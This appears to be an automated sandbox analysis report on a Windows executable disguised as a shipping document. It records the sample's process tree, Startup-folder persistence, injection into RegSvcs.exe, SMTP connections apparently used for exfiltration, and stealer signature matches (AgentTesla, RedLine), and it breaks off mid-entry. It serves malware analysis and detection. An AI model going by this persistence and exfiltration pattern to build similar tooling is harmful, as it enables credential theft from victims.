GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2024 17:15:25.240804911 CET	49705	443	192.168.2.6	172.67.74.152
Nov 19, 2024 17:15:25.240904093 CET	443	49705	172.67.74.152	192.168.2.6
Nov 19, 2024 17:15:25.240978003 CET	49705	443	192.168.2.6	172.67.74.152
Nov 19, 2024 17:15:25.248990059 CET	49705	443	192.168.2.6	172.67.74.152
Nov 19, 2024 17:15:25.249028921 CET	443	49705	172.67.74.152	192.168.2.6
Nov 19, 2024 17:15:35.246308088 CET	49705	443	192.168.2.6	172.67.74.152
Nov 19, 2024 17:15:35.287328959 CET	443	49705	172.67.74.152	192.168.2.6
Nov 19, 2024 17:15:35.898542881 CET	49709	587	192.168.2.6	198.54.122.135
Nov 19, 2024 17:15:36.908718109 CET	49709	587	192.168.2.6	198.54.122.135
Nov 19, 2024 17:15:38.022931099 CET	49710	443	192.168.2.6	172.67.74.152
Nov 19, 2024 17:15:38.022975922 CET	443	49710	172.67.74.152	192.168.2.6
Nov 19, 2024 17:15:38.023219109 CET	49710	443	192.168.2.6	172.67.74.152
Nov 19, 2024 17:15:38.025996923 CET	49710	443	192.168.2.6	172.67.74.152
Nov 19, 2024 17:15:38.026016951 CET	443	49710	172.67.74.152	192.168.2.6
Nov 19, 2024 17:15:47.948121071 CET	49710	443	192.168.2.6	172.67.74.152
Nov 19, 2024 17:15:47.991345882 CET	443	49710	172.67.74.152	192.168.2.6
Nov 19, 2024 17:15:48.399377108 CET	49716	587	192.168.2.6	198.54.122.135
Nov 19, 2024 17:15:49.408759117 CET	49716	587	192.168.2.6	198.54.122.135
Nov 19, 2024 17:15:51.408739090 CET	49716	587	192.168.2.6	198.54.122.135
Nov 19, 2024 17:15:55.408745050 CET	49716	587	192.168.2.6	198.54.122.135
Nov 19, 2024 17:16:03.408792973 CET	49716	587	192.168.2.6	198.54.122.135

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2024 17:15:25.229427099 CET	54868	53	192.168.2.6	1.1.1.1
Nov 19, 2024 17:15:25.236397982 CET	53	54868	1.1.1.1	192.168.2.6
Nov 19, 2024 17:15:35.889763117 CET	53186	53	192.168.2.6	1.1.1.1
Nov 19, 2024 17:15:35.897780895 CET	53	53186	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 19, 2024 17:15:25.229427099 CET	192.168.2.6	1.1.1.1	0x5d65	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 19, 2024 17:15:35.889763117 CET	192.168.2.6	1.1.1.1	0xf9e0	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 19, 2024 17:15:25.236397982 CET	1.1.1.1	192.168.2.6	0x5d65	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 19, 2024 17:15:25.236397982 CET	1.1.1.1	192.168.2.6	0x5d65	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Nov 19, 2024 17:15:25.236397982 CET	1.1.1.1	192.168.2.6	0x5d65	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 19, 2024 17:15:35.897780895 CET	1.1.1.1	192.168.2.6	0xf9e0	No error (0)	mail.privateemail.com	198.54.122.135	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	11:15:16
Start date:	19/11/2024
Path:	C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe"
Imagebase:	0x680000
File size:	1'199'616 bytes
MD5 hash:	E53EAA2914DC091F2E146B5665775EAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:15:18
Start date:	19/11/2024
Path:	C:\Users\user\AppData\Local\cyclop\juvenile.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe"
Imagebase:	0xd70000
File size:	1'199'616 bytes
MD5 hash:	E53EAA2914DC091F2E146B5665775EAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.2175869516.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:15:20
Start date:	19/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe"
Imagebase:	0x400000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:15:20
Start date:	19/11/2024
Path:	C:\Users\user\AppData\Local\cyclop\juvenile.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\cyclop\juvenile.exe"
Imagebase:	0xd70000
File size:	1'199'616 bytes
MD5 hash:	E53EAA2914DC091F2E146B5665775EAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000002.2202431029.0000000003840000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:15:23
Start date:	19/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\cyclop\juvenile.exe"
Imagebase:	0xaa0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2334390218.0000000002C7F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2334390218.0000000002C7F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.2334390218.0000000002C7F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2335172794.0000000003045000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2336361371.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2336361371.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.2336361371.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.2322641026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2335172794.000000000301A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2335172794.000000000301A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2338131116.00000000056F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2338131116.00000000056F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.2338131116.00000000056F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000005.00000002.2338131116.00000000056F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:15:30
Start date:	19/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs"
Imagebase:	0x7ff755cc0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:15:31
Start date:	19/11/2024
Path:	C:\Users\user\AppData\Local\cyclop\juvenile.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\cyclop\juvenile.exe"
Imagebase:	0xd70000
File size:	1'199'616 bytes
MD5 hash:	E53EAA2914DC091F2E146B5665775EAA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000002.2303120094.0000000002080000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:15:32
Start date:	19/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\cyclop\juvenile.exe"
Imagebase:	0x190000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:15:32
Start date:	19/11/2024
Path:	C:\Users\user\AppData\Local\cyclop\juvenile.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\cyclop\juvenile.exe"
Imagebase:	0xd70000
File size:	1'199'616 bytes
MD5 hash:	E53EAA2914DC091F2E146B5665775EAA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000002.2321963047.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:15:35
Start date:	19/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\cyclop\juvenile.exe"
Imagebase:	0xdb0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3396205301.000000000330A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3396205301.000000000330A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3396205301.0000000003335000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	7.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	60

Executed Functions

Function 006AB043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a476602b7789b4980037bca6b84dd2c0d684812070748492ef431d320c6df0d1
Instruction ID: 593c66feaeca7c816003c6b50fd078c55f3263ef9b1e2085d0f4055882b3cce7
Opcode Fuzzy Hash: a476602b7789b4980037bca6b84dd2c0d684812070748492ef431d320c6df0d1
Instruction Fuzzy Hash: 24325E75A022288FCB249F54DC816E9B7F6FF4B310F1841D9E40AA7A86D7349E81CF56

Function 00683D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00683AA3,?), ref: 00683D45
IsDebuggerPresent.KERNEL32(?,?,?,?,00683AA3,?), ref: 00683D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,00741148,00741130,?,?,?,?,00683AA3,?), ref: 00683DC8

Part of subcall function 00686430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00683DEE,00741148,?,?,?,?,?,00683AA3,?), ref: 00686471

SetCurrentDirectoryW.KERNEL32(?,?,?,00683AA3,?), ref: 00683E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,007328F4,00000010), ref: 006F1CCE
SetCurrentDirectoryW.KERNEL32(?,00741148,?,?,?,?,?,00683AA3,?), ref: 006F1D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0071DAB4,00741148,?,?,?,?,?,00683AA3,?), ref: 006F1D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,00683AA3), ref: 006F1D90

Part of subcall function 00683E6E: GetSysColorBrush.USER32(0000000F), ref: 00683E79
Part of subcall function 00683E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00683E88
Part of subcall function 00683E6E: LoadIconW.USER32(00000063), ref: 00683E9E
Part of subcall function 00683E6E: LoadIconW.USER32(000000A4), ref: 00683EB0
Part of subcall function 00683E6E: LoadIconW.USER32(000000A2), ref: 00683EC2
Part of subcall function 00683E6E: RegisterClassExW.USER32(?), ref: 00683F30

Part of subcall function 006836B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006836E6
Part of subcall function 006836B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00683707
Part of subcall function 006836B8: ShowWindow.USER32(00000000,?,?,?,?,00683AA3,?), ref: 0068371B
Part of subcall function 006836B8: ShowWindow.USER32(00000000,?,?,?,?,00683AA3,?), ref: 00683724

Part of subcall function 00684FFC: _memset.LIBCMT ref: 00685022
Part of subcall function 00684FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006850CB

Strings

runas, xrefs: 006F1D84
This is a third-party compiled AutoIt script., xrefs: 006F1CC8
()s, xrefs: 006F1D49

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: ()s$This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-236207865
Opcode ID: 828e9d074a687b01cc480b62eeb2afb4f2786fcc08ef85a054c722e6e40b2f83
Instruction ID: daf61764e61e409b16aeed05f31038bc07ad36a9dd35964c02771924ae2cffcc
Opcode Fuzzy Hash: 828e9d074a687b01cc480b62eeb2afb4f2786fcc08ef85a054c722e6e40b2f83
Instruction Fuzzy Hash: 83512A3494424CEADB11BBF4DC45EFD7B779F06B40F40826AF20266292DF784A86CB25

Function 0069DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0069DDEC
GetCurrentProcess.KERNEL32(00000000,0071DC38,?,?), ref: 0069DEAC
GetNativeSystemInfo.KERNELBASE(?,0071DC38,?,?), ref: 0069DF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 0069DF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 0069DF1F
GetSystemInfo.KERNEL32(?,0071DC38,?,?), ref: 0069DF29
GetSystemInfo.KERNEL32(?,0071DC38,?,?), ref: 0069DF35

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: c98b08f38694be2516c7ebcf6d75aa0e4df5d0b88a8a13ebbd6e8d0581c2cb15
Instruction ID: 77e63dd58c687acbf43c43975d22377e85d58727a1505ea60efc0ef45ef6ae31
Opcode Fuzzy Hash: c98b08f38694be2516c7ebcf6d75aa0e4df5d0b88a8a13ebbd6e8d0581c2cb15
Instruction Fuzzy Hash: CD6192B180A384DFCF15CF6898C11E97FBA6F29300B1989E9D8459F347C664C949CB6A

Function 0068406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0068449E,?,?,00000000,00000001), ref: 0068407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0068449E,?,?,00000000,00000001), ref: 00684092
LoadResource.KERNEL32(?,00000000,?,?,0068449E,?,?,00000000,00000001,?,?,?,?,?,?,006841FB), ref: 006F4F1A
SizeofResource.KERNEL32(?,00000000,?,?,0068449E,?,?,00000000,00000001,?,?,?,?,?,?,006841FB), ref: 006F4F2F
LockResource.KERNEL32(0068449E,?,?,0068449E,?,?,00000000,00000001,?,?,?,?,?,?,006841FB,00000000), ref: 006F4F42

Strings

SCRIPT, xrefs: 00684088

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 1de4a8290c67e3d3f7048cc3173e9a792eb076a473a5d7f977e19ec198b25223
Instruction ID: 828c8248eca89b2fee8a0940e29af5ab33f570a0cf3945395582f9d4aa095f66
Opcode Fuzzy Hash: 1de4a8290c67e3d3f7048cc3173e9a792eb076a473a5d7f977e19ec198b25223
Instruction Fuzzy Hash: 9811FA71200701BFE7319B65EC49F677BBAEFC5B51F14866CF616962A0DE71DC008A60

Function 00693B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON

Download Yara Rule

Strings

t, xrefs: 006F701F
@, xrefs: 00694176
t, xrefs: 006940EC
t, xrefs: 006940A4

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @$ t$ t$ t
API String ID: 3728558374-3501327379
Opcode ID: 51d9cf0fcdd5e2cf90fa2f9d90118df46cd2ef9b963a26eea208c1ff2a560b97
Instruction ID: 6092491997a7676c88f40c083724773edd9a74b7c74a28e4153ede3a0a30a8d5
Opcode Fuzzy Hash: 51d9cf0fcdd5e2cf90fa2f9d90118df46cd2ef9b963a26eea208c1ff2a560b97
Instruction Fuzzy Hash: D3729B74D04219ABCF14DF94C481AFEB7BBEF48300F14805AE909AB791DB31AE46CB95

Function 006C6CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,006F2F49), ref: 006C6CB9
FindFirstFileW.KERNELBASE(?,?), ref: 006C6CCA
FindClose.KERNEL32(00000000), ref: 006C6CDA

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: fa4d681dcddebb7a92891b7927a06ba4a44a9e8f3edb8aa526ea2ef7ed734658
Instruction ID: 0c0b33d764c33a8100f98e863f3476e45fbd809c8dcc5ee457ccd25cfe8f2968
Opcode Fuzzy Hash: fa4d681dcddebb7a92891b7927a06ba4a44a9e8f3edb8aa526ea2ef7ed734658
Instruction Fuzzy Hash: 6FE012318145159782206778EC099EA766DDE05339B104719F575C12D0EF689D4445DD

Function 00693200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON

Download Yara Rule

Strings

t, xrefs: 006F933E

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
